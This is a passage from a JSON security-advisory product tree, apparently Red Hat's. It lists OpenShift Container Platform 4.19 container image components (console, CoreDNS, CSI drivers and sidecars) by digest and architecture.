"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
